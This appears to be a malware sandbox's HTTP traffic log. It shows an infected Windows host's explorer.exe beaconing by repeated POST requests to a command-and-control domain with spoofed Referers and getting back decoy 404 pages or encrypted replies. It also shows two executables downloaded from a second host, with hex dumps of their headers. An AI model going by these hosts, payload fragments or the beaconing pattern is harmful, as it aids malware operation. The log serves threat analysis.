Dec 1, 2021 09:14:04.637927055 CET	2857	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pxptimk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 266 Host: host-data-coin-11.com
Dec 1, 2021 09:14:04.740947008 CET	2858	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:04 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49775	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:06.034493923 CET	2859	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://smfbsrgxse.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 306 Host: host-data-coin-11.com
Dec 1, 2021 09:14:06.136996031 CET	2860	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:06 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49757	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:13:55.320594072 CET	1079	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nbriredl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 368 Host: host-data-coin-11.com
Dec 1, 2021 09:13:55.425843000 CET	1080	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:13:55 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f7 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49776	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:06.227667093 CET	2860	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nabmhhv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 145 Host: host-data-coin-11.com
Dec 1, 2021 09:14:06.335937023 CET	2861	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:06 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.4	49777	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:06.425805092 CET	2862	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mdyfwsxro.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 336 Host: host-data-coin-11.com
Dec 1, 2021 09:14:06.530718088 CET	2863	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:06 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 48 ec a0 8a 70 bc 57 da 4a d4 f6 2e 87 25 eb c3 94 58 23 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OU&1UPJ%9HpWJ.%X#c0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.4	49778	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:06.886311054 CET	2864	OUT	GET /files/6096_1638289274_6885.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
Dec 1, 2021 09:14:06.968278885 CET	2865	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:06 GMT Content-Type: application/x-msdos-program Content-Length: 163328 Connection: close Last-Modified: Tue, 30 Nov 2021 16:21:14 GMT ETag: "27e00-5d203f23b200e" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 53 ec f2 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 42 01 00 00 ec 74 02 00 00 00 00 12 2a 00 00 00 10 00 00 00 60 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 76 02 00 04 00 00 78 5b 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 e8 01 00 78 00 00 00 00 b0 75 02 18 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 61 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 95 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 40 01 00 00 10 00 00 00 42 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 90 00 00 00 60 01 00 00 92 00 00 00 46 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 75 73 02 00 00 02 00 00 18 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 65 66 65 67 00 00 72 02 00 00 00 80 75 02 00 04 00 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 75 79 75 73 00 00 70 02 00 00 00 90 75 02 00 04 00 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 60 2e 76 65 6e 75 00 00 00 17 00 00 00 00 a0 75 02 00 02 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 60 2e 72 73 72 63 00 00 00 18 83 00 00 00 b0 75 02 00 84 00 00 00 fa 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 44 24 04 c2 04 00 81 00 40 36 ef c6 c3 55 8b ec 81 ec 2c 0c 00 00 8b 45 08 53 56 8b 30 8b 40 04 57 33 ff 81 3d 04 50 b5 02 ee 00 00 00 89 45 f8 75 09 57 57 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELS_Bt*`@@vx[Dxua@`d.textP@B `.rdata~`F@@.data`us@.fefegru@@.guyuspu@`.venuu@`.rsrcu@@3D$@6U,ESV0@W3=PEuWW

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.4	49779	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:09.580408096 CET	3034	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kpgguo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 230 Host: host-data-coin-11.com
Dec 1, 2021 09:14:09.682729006 CET	3035	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.4	49780	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:09.771330118 CET	3036	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tevvfr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 241 Host: host-data-coin-11.com
Dec 1, 2021 09:14:09.873147964 CET	3037	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.4	49781	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:09.991312027 CET	3037	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aryonwruu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 183 Host: host-data-coin-11.com
Dec 1, 2021 09:14:10.090151072 CET	3038	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:10 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.4	49782	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:10.177675962 CET	3039	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vefoyiify.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 152 Host: host-data-coin-11.com
Dec 1, 2021 09:14:10.281600952 CET	3039	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OU&1UPJ$dP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.4	49783	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:10.409068108 CET	3040	OUT	GET /game.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
Dec 1, 2021 09:14:10.491420031 CET	3041	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:10 GMT Content-Type: application/x-msdos-program Content-Length: 351744 Connection: close Last-Modified: Wed, 01 Dec 2021 08:14:01 GMT ETag: "55e00-5d21141ab62f3" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bf 4f 57 03 fb 2e 39 50 fb 2e 39 50 fb 2e 39 50 68 60 a1 50 fa 2e 39 50 94 58 92 50 d5 2e 39 50 94 58 a7 50 e2 2e 39 50 94 58 93 50 79 2e 39 50 f2 56 aa 50 f8 2e 39 50 fb 2e 38 50 18 2e 39 50 94 58 96 50 fa 2e 39 50 94 58 a3 50 fa 2e 39 50 94 58 a4 50 fa 2e 39 50 52 69 63 68 fb 2e 39 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 5f 95 6a 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 fe 03 00 00 40 09 00 00 00 00 00 30 d0 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0d 00 00 04 00 00 51 3b 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 f9 03 00 28 00 00 00 00 e0 0c 00 70 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0d 00 38 1d 00 00 c0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 c5 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae fd 03 00 00 10 00 00 00 fe 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 cc 08 00 00 10 04 00 00 de 00 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 41 00 00 00 e0 0c 00 00 42 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 3b 00 00 00 30 0d 00 00 3c 00 00 00 22 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 fc 03 00 a6 fc 03 00 ba fc 03 00 ce fc 03 00 dc fc 03 00 f0 fc 03 00 06 fd 03 00 24 fd 03 00 3a fd 03 00 4a fd 03 00 5c fd 03 00 7c fd 03 00 92 fd 03 00 a4 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$OW.9P.9P.9Ph`P.9PXP.9PXP.9PXPy.9PVP.9P.8P.9PXP.9PXP.9PXP.9PRich.9PPEL_j`@0@pQ;(pA08@l.text `.data@@.rsrcpAB@@.reloc;0<"@B$:J\\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.4	49784	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:12.617144108 CET	3406	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://guokyvqq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 284 Host: host-data-coin-11.com
Dec 1, 2021 09:14:12.721808910 CET	3407	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 